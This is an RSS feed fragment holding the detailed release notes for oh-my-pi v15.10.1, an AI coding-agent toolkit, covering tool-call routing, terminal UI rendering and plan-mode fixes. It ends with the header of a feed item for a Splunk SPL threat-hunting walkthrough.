<li>Fixed Anthropic Opus requests unnecessarily forcing <code>tool_choice.disable_parallel_tool_use</code>, allowing Claude Opus to use the provider's default parallel tool-calling behavior again.</li>
<li>Fixed parallel <code>function_call</code> items losing arguments against llama.cpp's OpenAI Responses endpoint (<code>/v1/responses</code>), where every call but the last finalized with <code>{}</code> and the agent rejected them with <code>path: Invalid input: expected string, received undefined</code>. llama.cpp's <code>to_json_oaicompat_resp</code> emits <code>output_item.added</code> with only <code>item.call_id</code> (no <code>item.id</code>, no <code>output_index</code>) while the matching <code>function_call_arguments.delta</code> carries <code>item_id: "fc_&lt;call_id&gt;"</code>. <code>processResponsesStream</code> now registers function-call and custom-tool-call items under <code>item.call_id</code> as a secondary lookup key (alongside <code>item.id</code>/<code>output_index</code>) so identifier-deviant hosts route deltas and done events to the right block. (<a href="https://github.com/can1357/oh-my-pi/issues/2015" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2015/hovercard">#2015</a>)</li>
<li>Fixed <code>PI_REQ_DEBUG</code> response recording truncating the captured body when a streamed response was cancelled mid-flight. The response tee in <code>wrapResponse</code> could call <code>FileRequestDebugResponseLog.close()</code> from both the <code>cancel</code> callback and the resumed <code>pull</code> (which observes <code>done</code> once the source reader is cancelled); the second caller saw the handle already nulled and returned before the first caller's pending write flushed, so the <code>.res.log</code> lost the already-buffered chunk. <code>close()</code> now memoizes its flush-and-close promise so every caller awaits the same completion.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added <code>display.smoothStreaming</code> setting (default <code>true</code>) to let users enable or disable smooth assistant-stream text reveal</li>
<li>Added <code>/tan &lt;work&gt;</code> slash command to fork the current conversation into a background agent so tangential work can continue asynchronously while your main session stays active</li>
<li>Added a background <code>/tan</code> dispatch message that records the handoff in the transcript and marks the delegated work as non-blocking</li>
<li>Added <code>providerPromptCacheKey</code> support to <code>CreateAgentSessionOptions</code> so <code>/tan</code> background sessions can reuse the parent session’s prompt-cache lineage</li>
<li>Added session cloning for <code>/tan</code> runs with copied artifacts and shared MCP proxy tools</li>
<li>Added <code>SessionManager.forkFrom</code>’s optional <code>suppressBreadcrumb</code> mode to avoid breadcrumb updates when forking background <code>/tan</code> sessions</li>
<li>Added OSC 5522 enhanced paste handling in <code>InputController</code>, so terminal clipboard events are decoded as image or text payloads and inserted without passing raw paste sequences to the editor</li>
<li>Added bracketed image-path paste support in <code>CustomEditor</code> so a single pasted image file path (PNG/JPEG/GIF/WEBP) is loaded from disk and inserted as an image candidate</li>
<li>Added direct support for <code>Image #N</code> insertion from pasted local image paths by routing successful image-path pastes through the same image normalization and resize flow as clipboard image pastes</li>
<li>Added <code>/fresh</code> to rotate the provider-facing session id and clear in-memory provider stream/cache state without changing the local session file.</li>
<li>Added a <code>ChatBlock</code> transcript primitive (<code>modes/components/chat-block.ts</code>) and a single <code>ctx.present(...)</code> sink (with <code>ctx.resetTranscript()</code>) so chat output is mounted in one place instead of the repeated <code>chatContainer.addChild(...)</code> + <code>ui.requestRender()</code> pattern scattered across controllers. <code>ChatBlock</code> carries a React/Svelte-style lifecycle — <code>onMount</code> starts effects, <code>onCleanup</code> registers teardown, <code>finish()</code> self-completes (stops timers and freezes the block at its final content), and <code>dispose()</code>/<code>resetTranscript()</code> tears everything down — so animated blocks own their own resources instead of leaking <code>setInterval</code>/<code>requestRender</code> bookkeeping into callers. The MCP "Connecting…" spinner is now such a block.</li>
<li>Added a <code>framedBlock</code> output-block helper (<code>tui/output-block.ts</code>) plus a <code>borderColor</code> override and <code>applyBg: false</code> (no background fill) on output blocks, a <code>renderStatusLine</code> <code>iconOverride</code>, and an <code>icon.search</code> (magnifier) theme symbol — so tool renderers can draw self-contained muted-outline frames and search-family tools can show a magnifier instead of a checkmark.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>
<p>Changed the bash tool frame to use a plain top rule instead of repeating "Bash" in the title bar, and folded minimizer raw-output artifact links into the status footer as <code>Artifact: &lt;id&gt;</code>.</p>
</li>
<li>
<p>Changed grouped <code>read</code> output to use a white filled-circle mark for the group/single-read success state and omit duplicate per-file success marks inside multi-read groups.</p>
</li>
<li>
<p>Changed assistant streaming output to reveal text incrementally at 30 FPS with grapheme-safe adaptive catch-up, instead of replacing the whole message chunk-by-chunk</p>
</li>
<li>
<p>Changed shimmer-driven TUI animations (working text, pending bash/eval borders, and theme activity-spinner documentation) to render at 30fps instead of 60fps.</p>
</li>
<li>
<p>Changed running <code>task</code> tool agent rows to use a static <code>•</code> marker and shimmer only the subagent name, leaving descriptions, stats, and nested tool detail text solid while removing the rotating status glyph from those rows.</p>
</li>
<li>
<p>Changed settings singleton method access to reuse bound methods for the active instance instead of allocating a new bound function on every <code>settings.get</code> lookup.</p>
</li>
<li>
<p>Changed plan-mode approval to keep the drafted <code>local://&lt;slug&gt;-plan.md</code> file at its original name as the canonical plan path, so approved plans are no longer renamed when leaving plan mode</p>
</li>
<li>
<p>Changed plan-mode write enforcement so only <code>local://</code> artifact files are writable during planning, blocking working-tree edits and allowing scratch or draft plan files in the local artifact area</p>
</li>
<li>
<p>Changed the <code>todo</code> tool result renderer to stop redrawing every phase's full task list on each update: when a multi-phase list is rendered collapsed (the default, not manually expanded), only phases the latest update touched — the phase holding the in_progress task, any phase with a just-completed task, and phases named by the ops that ran (<code>init</code> counts as touching all) — render their tasks; untouched phases collapse to a one-line <code>N. Name  done/total</code> summary. When call args are unavailable (e.g. transcript rebuilds) it falls back to the in_progress/completed-transition signals, and the manual expand toggle still shows every task. Also dropped the blank separator line previously inserted between phases.</p>
</li>
<li>
<p>Changed non-agent API operations (title and commit-message generation, image generation, web search, eval <code>llm()</code>, auto-thinking classifier, memory consolidation) to use session-aware API key resolution with auth retries via <code>registry.resolver()</code> / <code>authStorage.resolver()</code>, refreshing the active credential before rotating to another account</p>
</li>
<li>
<p>Changed image generation to wrap every provider fetch branch in <code>withAuth</code>, so 401 / usage-limit errors trigger credential force-refresh and rotation for authStorage-backed providers (OpenAI-hosted, antigravity, xai-oauth) while env-only providers (openrouter, gemini) stay single-attempt</p>
</li>
<li>
<p>Changed web-search providers using <code>authStorage.getApiKey</code> (anthropic, exa, tavily, parallel, synthetic, zai, kimi) to wrap HTTP calls in <code>withAuth</code> for automatic credential rotation on 401 / usage-limit errors</p>
</li>
<li>
<p>Changed the directory grouping for <code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>ast_edit</code>, and <code>lsp</code> diagnostics from a single flat <code># dir/</code> heading per immediate directory to a multi-level tree that folds the common path prefix into one heading. Previously every group repeated the full directory path — so results rooted outside cwd printed the absolute prefix (e.g. <code>/Users/me/proj/</code>) on every heading and nested directories were never collapsed. Now a single-child directory chain folds into one heading (<code># packages/pkg/src/</code>, including an absolute root for out-of-cwd results), subdirectories nest one <code>#</code> deeper (<code>## nested/</code> → <code>### child.ts</code>), and each directory's own files are listed before its subdirectories. TUI hyperlink reconstruction tracks the nested directory stack across the whole output so file and code-frame links keep resolving to the correct absolute paths.</p>
</li>
<li>
<p>Changed the plan-mode approval surface from an inline transcript block plus a separate bottom selector into a single fullscreen overlay (like <code>/copy</code>) and overhauled its navigation. The overlay now renders the plan per-section through <code>ScrollView</code> (line-level ↑/↓ scroll, Shift+↑/↓ to scroll faster, PgUp/PgDn, g/G) with no stray per-line <code>…</code>, and — when the terminal is wide enough and the plan has ≥2 headings — shows a compact VS Code-style section sidebar (the redundant plan-title heading and any "Contents" label are omitted). Focus moves between regions with Tab/Shift+Tab (and flows at the edges: Down past the last section or the bottom of the body drops into the approval options; Up steps back), while the sidebar glows to track the scrolled section. The sidebar can fast-jump between sections, delete a section (with <code>u</code> undo), and annotate sections with feedback (<code>a</code>); deletions and annotations are collected into refinement feedback that is submitted back to the model when the operator picks "Refine plan". Mouse works too: clicking an approval option activates it, clicking a sidebar section jumps to it, and the wheel scrolls the plan. ←/→ always drive the model-tier slider, Enter confirms, the external-editor key opens the plan, and Esc cancels. The overlay borrows the terminal's alternate screen buffer for its lifetime (<code>fullscreen</code> overlay), so the transcript stays put on the normal screen instead of bleeding through scrollback behind the modal.</p>
</li>
<li>
<p>Changed the interactive controllers (command, MCP, selector, extension-UI, event), debug panels, and the status/error/warning helpers to render chat output through <code>ctx.present(...)</code> instead of appending to <code>chatContainer</code> and calling <code>ui.requestRender()</code> directly; transcript rebuilds dispose live blocks via <code>ctx.resetTranscript()</code> so animated blocks' timers stop on reset.</p>
</li>
<li>
<p>Changed tool-execution block rendering so the container (<code>ToolExecutionComponent</code>) is a transparent passthrough — it no longer inserts a top/bottom blank line, adds left/right padding, or paints a state-colored background behind tool output. Tools with substantial body now self-frame with a muted outline and the tool title in the frame's top bar (<code>edit</code>/<code>apply_patch</code>, <code>write</code>, <code>ask</code>, <code>todo</code>, <code>github</code>, <code>goal</code>, <code>inspect_image</code>, <code>search_tool_bm25</code>, <code>task</code>), matching the already-framed <code>bash</code>/<code>read</code>/<code>eval</code>/<code>debug</code>/<code>web_search</code>/<code>lsp</code> blocks, while streaming/in-progress and trivial results collapse to a clean status line. The search-family list tools (<code>find</code>, <code>search</code>, <code>ast_grep</code>) and <code>job</code> render frameless/minimal; <code>find</code>/<code>search</code>/<code>ast_grep</code> show a magnifier on success instead of a checkmark, and <code>job</code> drops its <code>Job:</code> label prefix (the per-job rows are self-describing). The <code>search_tool_bm25</code>, <code>github</code>, and <code>inspect_image</code> frames draw with no background fill, and <code>inspect_image</code>'s label was shortened to <code>Inspect</code>.</p>
</li>
<li>
<p>Changed the plan-mode active prompt (<code>prompts/system/plan-mode-active.md</code>) to make plans decision-complete and cut filler. Added an Objective framing ("another engineer can execute end-to-end without making a single design decision"), a shared "Resolving Unknowns" section (explore discoverable facts before asking; reserve <code>ask</code> for non-derivable preferences/tradeoffs with 2–4 options + a recommended default), and a single shared "The Plan" structure (Context / Approach grouped by behavior not file-by-file / ≤5 Critical files / Verification / Assumptions) that replaces the per-branch structure guidance previously duplicated across the iterative and parallel workflows. Added explicit prohibitions on sections that decide nothing (Non-Goals, Out of Scope, Alternatives Considered, Risks/Mitigations boilerplate, Future Work), on enumerating every file/line, and on inventing schema/validation/precedence policy the request never established.</p>
</li>
<li>
<p>Changed completion notifications (<code>completion.notify</code>) to fire whenever the agent yields its turn, including in the foreground. The <code>agent_end</code> notification was previously gated behind background mode (<code>isBackgrounded</code>), so an ordinary foreground turn never emitted one; the gate is gone and the desktop toast now fires on every normal turn completion (still skipped for aborted/error turns and when <code>completion.notify</code> is <code>off</code>).</p>
</li>
<li>
<p>Changed the in-progress <code>task</code> tool block to keep the shared <code>context</code> brief (<code># Goal</code> / <code># Constraints</code> background) visible after the first progress snapshot arrives, instead of dropping it the moment the streaming call view was replaced by the result frame, and to stop animating a spinner/clock next to the <code>Task</code> frame header while running — the per-agent body lines already carry their own running spinner, so the header now shows a static state icon (matching the completed/failed header icons). The context is rendered through a shared <code>buildContextSection</code> helper that also undoes per-field double-encoding, so the brief reads cleanly in the result frame even though <code>renderResult</code> receives the raw (un-repaired) tool args.</p>
</li>
<li>
<p>Changed the messaging shown when you press Esc to interrupt a streaming turn from the ambiguous <code>Operation aborted</code> / <code>Tool execution was aborted: Request was aborted</code> to <code>Interrupted by user</code>, so a deliberate user interrupt no longer reads like an internal failure. Every Esc/flush interrupt path (<code>onEscape</code> while streaming, the queued-message restore-and-abort path, and the empty-submit queue flush) threads the reason through <code>AgentSession.abort({ reason })</code> → <code>Agent.abort(reason)</code> so it rides the <code>AbortController</code> onto the aborted assistant message's <code>errorMessage</code>; the turn label renders it verbatim on both the live and replay paths, and the synthetic placeholder results paired with in-flight tool calls now read <code>Tool execution was aborted: Interrupted by user</code>. Aborts that carry no reason still fall back to the retry-aware <code>Operation aborted</code> generic. Transcript label resolution is centralized in <code>resolveAbortLabel</code> (<code>session/messages.ts</code>).</p>
</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the <code>/background</code> (and <code>/bg</code>) slash command and the background-mode subsystem it was the sole entry point for — <code>InteractiveMode.isBackgrounded</code>, <code>createBackgroundUiContext</code>, <code>handleBackgroundEvent</code>, and every <code>isBackgrounded</code> guard across the input/event/extension-UI controllers and UI helpers. The command suspended the whole process group via <code>SIGTSTP</code> (a leftover testing shortcut) instead of detaching the running agent, which is not the expected workflow — use terminal panes or a multiplexer instead.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed inline <code>find</code> and <code>search</code> result blocks to align with grouped <code>read</code> output and render their success headers with the normal tool-title color instead of accent blue.</p>
</li>
<li>
<p>Fixed the working-status shimmer to opt into the loader's 30fps animated-message repaint path while keeping both the status spinner and pending bash/eval tool spinners on their normal 80 ms glyph cadence.</p>
</li>
<li>
<p>Fixed consecutive <code>read</code> tool calls failing to collapse into a single grouped block when a reasoning model emits one read per completion (<code>[thinking, read]</code>). The read group was reset on every assistant <code>message_start</code>, so each read rendered as its own one-entry <code>Read …</code> line; now a read run accretes across completions and is broken only by a rendered non-empty text/thinking block, a non-read tool, or a user/IRC message — matching the transcript-rebuild path. <code>ReadToolGroupComponent</code> now reports its live/finalized state so the growing <code>Read (N)</code> header repaints correctly on native-scrollback (risk) terminals.</p>
</li>
<li>
<p>Fixed the <code>task</code> tool shared-context brief rendering raw Markdown headings (<code># Goal</code>, <code># Constraints</code>) inside framed call/result blocks instead of using the normal Markdown renderer.</p>
</li>
<li>
<p>Fixed the animated pending border on <code>bash</code>/<code>eval</code> blocks leaving a frozen dark "bar" segment behind after a backgrounded command finalized through the async update path. Once a command is auto-backgrounded (<code>details.async.state === "running"</code>) the block stays "partial" in the TUI until the async job-manager delivers the final result, but it also gets committed to native scrollback — so a mid-sweep shimmer frame baked a stray darkened border segment into the committed copy. The border now stops animating (and the 60fps redraw loop stops) the moment a block enters the backgrounded state, so the committed frame is a clean static border.</p>
</li>
<li>
<p>Fixed cold <code>omp</code> launch to clear native terminal history on the first paint, avoiding a once-per-launch duplicate welcome/transcript copy before the normal session replay.</p>
</li>
<li>
<p>Fixed plan approval resolution so <code>resolve</code> with <code>action: "apply"</code> can still find the plan file when <code>extra.title</code> is missing or stale by falling back to the current plan path and most-recent local plan artifacts</p>
</li>
<li>
<p>Fixed the search-family tool magnifier glyph (<code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>search_tool_bm25</code>) to use the <code>accent</code> title color instead of <code>success</code> green, so the icon matches the tool title in the status header instead of standing out</p>
</li>
<li>
<p>Fixed TTSR stream interrupts to pass the matched rule name through the abort reason, so aborted in-flight tool placeholders say why they were stopped instead of <code>Request was aborted</code>.</p>
</li>
<li>
<p>Fixed URL reads for binary/special payloads to reuse local readers: remote archives list their root entries, SQLite databases show their table overview, notebooks render as editable cells, and unrenderable binary returns a metadata notice instead of decoded byte garbage.</p>
</li>
<li>
<p>Fixed pasted image-file paths that cannot be loaded to fall back to normal text paste with status feedback instead of disappearing.</p>
</li>
<li>
<p>Fixed tool-output file paths not being clickable OSC 8 <code>file://</code> hyperlinks in several renderers. <code>read</code> titles for plain text and image files (the common case) emitted no link at all because the renderer only linked when a <code>resolvedPath</code> was recorded — which the ordinary file/image read paths never set, keeping the absolute path only in <code>meta.source</code>; the renderer now falls back to that source path. <code>write</code> headers were never wrapped in a hyperlink and now link to the absolute path written (file, archive entry, SQLite, and conflict resolutions). <code>edit</code>/<code>apply_patch</code> headers wrapped the model-supplied (often cwd-relative) argument path, producing a root-anchored <code>file:///rel/path</code> URI; they now link the absolute <code>details.path</code> instead. Finally, <code>search</code>, <code>ast_grep</code>, and <code>ast_edit</code> produced doubled link targets (<code>/proj/src/src/file.ts</code>) for searches scoped to a subdirectory, because the renderer resolved the cwd-relative display paths against the scope directory rather than cwd — the scoped-search base is now the session cwd (with the scoped file's absolute path still seeding single-file body lines).</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> to recover from 401 token failures by re-minting the failing OAuth credential in place before switching accounts</p>
</li>
<li>
<p>Fixed the bash tool corrupting commands that embed multi-byte UTF-8 (e.g. <code>✓</code>/<code>×</code> inside a <code>grep -E</code> pattern) ahead of a trailing <code>| head</code>/<code>| tail</code>. The <code>bash.stripTrailingHeadTail</code> rewrite cut at char-offset positions reported by <code>brush-parser</code> while slicing the command by byte offset, so the trailing-pipe strip landed mid-pattern and dropped the closing quote — turning <code>… |✓|×|XCTAssert" | tail -80</code> into <code>… |✓|×-80</code> and making execution fail with <code>pi-natives:command: unterminated double quote</code>. Fixed in <code>pi_shell::fixup</code> (<code>@oh-my-pi/pi-natives</code>).</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> to recover from 401 token failures by re-minting the failing OAuth credential in place before switching accounts</p>
</li>
<li>
<p>Fixed duplicate file entries in grouped outputs for <code>find</code>, <code>search</code>, <code>ast_grep</code>, <code>ast_edit</code>, and <code>lsp</code> diagnostics when the same path appeared multiple times</p>
</li>
<li>
<p>Fixed search, grep, and edit output rendering so repeated directory group blank-line boundaries no longer break nested path/link reconstruction</p>
</li>
<li>
<p>Fixed <code>omp dry-balance --bench</code> flooding the terminal with staircased, duplicated spinner/status lines (and an indented summary) when the tty has ONLCR/OPOST disabled (raw mode). The interactive progress region separated rows with a bare LF and repositioned with a column-preserving <code>\x1b[&lt;n&gt;A</code> cursor-up, both of which only land at column 0 when the terminal translates LF→CRLF; with that translation off, every 80 ms redraw cascaded down and to the right into scrollback. The live region now carriage-returns before every cleared row, terminates each row with CRLF, and caps each row to the terminal width so a wrapped line cannot desync the cursor-up from the logical line count.</p>
</li>
<li>
<p>Fixed inconsistent vertical spacing between transcript blocks: some blocks (tool results from <code>search</code>/<code>find</code> and other renderer-backed tools) rendered with a doubled gap (a leading <code>Spacer</code> plus the content box's own <code>paddingY</code>), while others (the grouped <code>read</code> card, file-mention lists, IRC cards) rendered with no gap at all. Vertical spacing is now owned entirely by the chat renderer: <code>TranscriptContainer</code> strips each block's plain-blank top/bottom edges and inserts exactly one blank line between consecutive blocks, so every block is separated by a single consistent gap regardless of which component produced it. Individual components (assistant/user/tool/read-group/bash/eval/skill/custom/hook/compaction/branch/todo-reminder/plan-review messages) no longer emit their own leading <code>Spacer</code>/<code>paddingY</code> for separation, and multi-row groups (IRC cards, file-mention lists, completed-job batches, and the bordered command/<code>/changelog</code>/<code>/context</code>/version/OAuth/debug panels) are wrapped as single <code>TranscriptBlock</code> children so the renderer spaces them as one unit. Background-colored box padding is preserved as block-internal design.</p>
</li>
<li>
<p>Fixed <code>resolve</code> with <code>action: "discard"</code> surfacing a hard <code>isError</code> "No pending action to resolve" failure to the model when the agent asked to cancel a staged action (e.g. an <code>ast_edit</code> preview) but nothing was pending. A discard is a request to reach the "no staged change" end-state, which already holds in that case, so it is now honored as a successful cancellation (<code>"Nothing to discard; no pending action remains."</code> with <code>details.action: "discard"</code>) instead of an error. <code>action: "apply"</code> with no pending action still errors.</p>
</li>
<li>
<p>Fixed the collapsed tool-output expand hint rendering double brackets (e.g. <code>((Ctrl+O for more))</code>) — the <code>EXPAND_HINT</code> text already carried its own parentheses and then <code>formatExpandHint</code> wrapped it again with the theme's bracket glyphs. The hint now resolves the key actually bound to <code>app.tools.expand</code> at render time and reads <code>⟨&lt;key&gt;: Expand⟩</code> (e.g. <code>⟨Ctrl+O: Expand⟩</code>), so a single bracket pair surrounds it and a user remap of the expand keybinding is reflected instead of a hard-coded <code>Ctrl+O</code>.</p>
</li>
<li>
<p>Fixed the <code>edit</code>/<code>apply_patch</code> tool dropping its outlined frame while streaming/in-progress (only the final result was framed); the in-progress diff preview now renders inside the same muted frame as the completed result.</p>
</li>
<li>
<p>Fixed the <code>todo</code> and <code>job</code> tools rendering a success icon and success styling on a failed/error result; error results now show the error icon and a red frame border.</p>
</li>
<li>
<p>Fixed <code>debug</code> tool refusing every <code>dlv</code> launch on Go modules. The launch handler ran <code>validateLaunchProgram</code> before adapter selection and rejected any directory program with <code>launch program resolves to a directory</code>, while dlv's default <code>mode=debug</code> requires a Go package path (a directory or <code>.go</code> source file). Adapter resolution now precedes validation, directory programs prefer adapters that advertise <code>acceptsDirectoryProgram</code> before falling back to native extensionless debuggers, the rejection only fires when the resolved adapter does not advertise that flag (set on <code>dlv</code> in <code>dap/defaults.json</code>), and dlv's <code>mode</code> is derived from the program shape — directories and <code>.go</code> files launch as <code>mode=debug</code>, other files as <code>mode=exec</code> — so <code>omp</code> can debug both Go packages and pre-built binaries (<a href="https://github.com/can1357/oh-my-pi/issues/2020" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2020/hovercard">#2020</a>).</p>
</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>applyBashFixups</code> corrupting commands that contain multi-byte UTF-8 before a trailing <code>| head</code>/<code>| tail</code> (or <code>2&gt;&amp;1</code>). <code>brush-parser</code> reports source positions as Unicode-scalar (char) offsets, but <code>pi_shell::fixup</code> sliced the command <code>&amp;str</code> by those numbers as if they were byte offsets, so each multi-byte char (e.g. <code>✓</code>/<code>×</code> in a <code>grep -E</code> pattern) shifted the cut earlier and left a mangled command — e.g. <code>… |✓|×|XCTAssert" | tail -80</code> became <code>… |✓|×-80</code>, orphaning the closing quote and making the shell reject the whole pipeline with <code>unterminated double quote</code>. Positions are now translated to byte offsets before slicing.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed Kitty temp-file image transmission, its startup support probe, the <code>PI_KITTY_IMAGE_TRANSMISSION</code> override, and the temp-file helper exports. Kitty/Ghostty image payloads now stay on in-band base64 before placeholder/direct placement, avoiding blank first renders from temp-file load races.</li>
<li>Renamed <code>RenderRequestOptions.allowUnknownViewportMutation</code> → <code>allowUnknownViewportTransientRepaint</code>. The option only permits a transient live-viewport repaint (autocomplete/IME/focused-editor chrome) on hosts that cannot report viewport position; it never authorizes a settled transcript commit. The old name implied any offscreen mutation was safe to push into native scrollback, which led callers to emit duplicate transcript copies.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>TUI.addStartListener()</code> so feature hooks can re-enable terminal modes after temporary stop/start cycles such as external-editor handoffs.</li>
<li>Added <code>Editor.pasteText()</code> to apply terminal-style paste handling for text inserted from non-bracketed paste transports</li>
<li>Added an optional <code>dispose()</code> lifecycle method to <code>Component</code> so components can release timers and subscriptions during permanent teardown</li>
<li>Added <code>Container.dispose()</code> to propagate teardown to child components when a component tree is permanently discarded</li>
<li>Added <code>Loader.dispose()</code> to stop the loader animation timer when the component is disposed</li>
<li>Added a <code>ScrollView</code> <code>ellipsis</code> option (defaults to <code>Ellipsis.Unicode</code>) so callers that pre-wrap content to width can pass <code>Ellipsis.Omit</code> and suppress the stray per-line <code>…</code> that lands on trailing padding.</li>
<li>Added <code>ScrollView.handleScrollKey()</code> plus a <code>fastScrollLines</code> option so every scroll view gets shared navigation keys, including Shift+Arrow to scroll faster.</li>
<li>Added <code>OverlayOptions.fullscreen</code>: while the topmost visible overlay sets it, the engine borrows the terminal's alternate screen buffer for the overlay's lifetime and paints only the modal there — no ED3, no transcript re-commit — so the transcript stays untouched on the normal screen and is not scrollable behind the modal. Mouse tracking (<code>?1000h</code>/<code>?1006h</code>) is enabled for the modal's lifetime and disabled on exit, so the rest of the app keeps the terminal's native text selection.</li>
<li>Added the <code>submitPinsViewportToTail</code> terminal capability and <code>detectSubmitPinsViewportToTail()</code>: genuine local terminals where a submit keystroke scrolls the host to its tail reconcile deferred native scrollback at the prompt-submit checkpoint even when the viewport position is unprobeable (Ghostty/kitty/iTerm/WezTerm/Alacritty). Restores the pre-regression submit reconciliation without re-enabling it for Windows Terminal/ConPTY, SSH, or multiplexers, where a submit is not proof the host is at the tail.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed static <code>Loader</code> messages to repaint only at the spinner's 80 ms cadence; time-dependent message colorizers can opt into 16 ms redraws with <code>animated: true</code>.</li>
<li>Changed keybinding matching to precompute canonical key sets so each input sequence is parsed once per binding check instead of once per candidate key.</li>
<li>Made <code>Component.invalidate()</code> optional so leaf components without render caches no longer need no-op invalidation hooks.</li>
<li><code>TERMINAL</code> is now a <code>RuntimeTerminal</code> whose post-construction capabilities (image protocol and the probe-driven flags) are writable, replacing the <code>as unknown as MutableTerminalInfo</code> cast pattern and the positional <code>withTerminalOverrides</code> rebuild with a prototype-preserving <code>clone()</code>.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed <code>Loader</code> text updates to skip identical messages and preserve the rendered <code>Text</code> cache instead of invalidating it every timer tick.</p>
</li>
<li>
<p>Fixed fullscreen overlay alt-frame rendering to reuse the current line-preparation path instead of calling removed fitting helpers.</p>
</li>
<li>
<p>Reduced TUI render-path line fitting by deferring overlay base-frame fitting until an overlay rebuild and by reusing already-fitted lines in emitters.</p>
</li>
<li>
<p>Reduced live-region pinned repaint output by diffing unchanged viewport rows when no sealed rows are being committed to native scrollback.</p>
</li>
<li>
<p>Fixed no-append live-region pinned repaints to re-anchor the hardware cursor when the logical viewport shifts.</p>
</li>
<li>
<p>Fixed keybinding matching so printable uppercase input preserves <code>Shift</code> for bindings such as <code>shift+a</code>.</p>
</li>
<li>
<p>Optimized terminal image-line detection and Thai/Lao AM normalization checks to avoid hot-path regex scans and substring allocations.</p>
</li>
<li>
<p>Fixed <code>Markdown.render()</code> cache hits returning the cache's mutable backing array, which let callers that append extra rows corrupt cached Markdown and duplicate those rows on every redraw.</p>
</li>
<li>
<p>Fixed first-paint full replays for callers that intentionally replace terminal history by allowing <code>TUI.start({ clearScrollback: true })</code>, so they do not briefly append an entire initial frame before the first clean replay.</p>
</li>
<li>
<p>Fixed ED3-risk streaming cap accounting to preserve the native scrollback high-water mark for rows that were already physically committed before transient frames were viewport-capped.</p>
</li>
<li>
<p>Fixed terminal stop and restore cleanup to disable enhanced paste mode so it does not remain enabled after shutdown</p>
</li>
<li>
<p>Removed the per-frame line-fit <code>Map</code> cache from the render timer path to avoid forcing JSC rope-string hashing during scheduled viewport repaints.</p>
</li>
<li>
<p>Fixed <code>visibleWidth()</code> so terminal column measurements for ANSI and OSC text now match the native truncation/wrapping helpers, including OSC 66 text-sizing spans being counted at their scaled payload width</p>
</li>
<li>
<p>Fixed cursor, padding, and line-fit behavior when strings contain tabs or OSC escapes by aligning <code>visibleWidth()</code> with the native text-width model</p>
</li>
<li>
<p>Fixed the transcript — or a re-appearing prior view such as the welcome screen — duplicating itself on terminals without a scroll-position oracle (Ghostty/kitty/iTerm/WezTerm) when a foreground tool completes by rewriting a partly-committed block, or when the transcript is reset. A non-destructive viewport repaint no longer re-paints rows that are byte-identical to what is already committed to native scrollback into the active grid; the repaint anchor is clamped to the committed-and-unchanged prefix (<code>min(firstChanged, scrollbackHighWater)</code>).</p>
</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): route llama.cpp parallel tool calls by <code>item.call_id</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605305722" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2016" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2016/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2016">#2016</a></li>
<li>fix(debug): accept directory programs for dlv and auto-select dlv mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4605979296" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2021" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2021/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2021">#2021</a></li>
<li>fix(ai): coerce singleton array arguments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4606419503" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2027" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2027/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2027">#2027</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.10.0...v15.10.1"><tt>v15.10.0...v15.10.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Splunk Exploring SPL: A Practical SOC Analyst Walkthrough for Search, Detection, and Threat Hunting]]></title>
<description><![CDATA[Hands-on Splunk SPL walkthrough covering searching, filtering, structuring, transforming, enrichment, and anomaly detection from a practical SOC analyst perspective.Cybersecurity | Splunk | SIEM | SPL | Threat Hunting | SOC AnalysisSecurity analysts deal with overwhelming amounts of telemetry eve...]]></description>
<link>https://tsecurity.de/de/3579533/hacking/splunk-exploring-spl-a-practical-soc-analyst-walkthrough-for-search-detection-and-threat-hunting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579533/hacking/splunk-exploring-spl-a-practical-soc-analyst-walkthrough-for-search-detection-and-threat-hunting/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:51 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
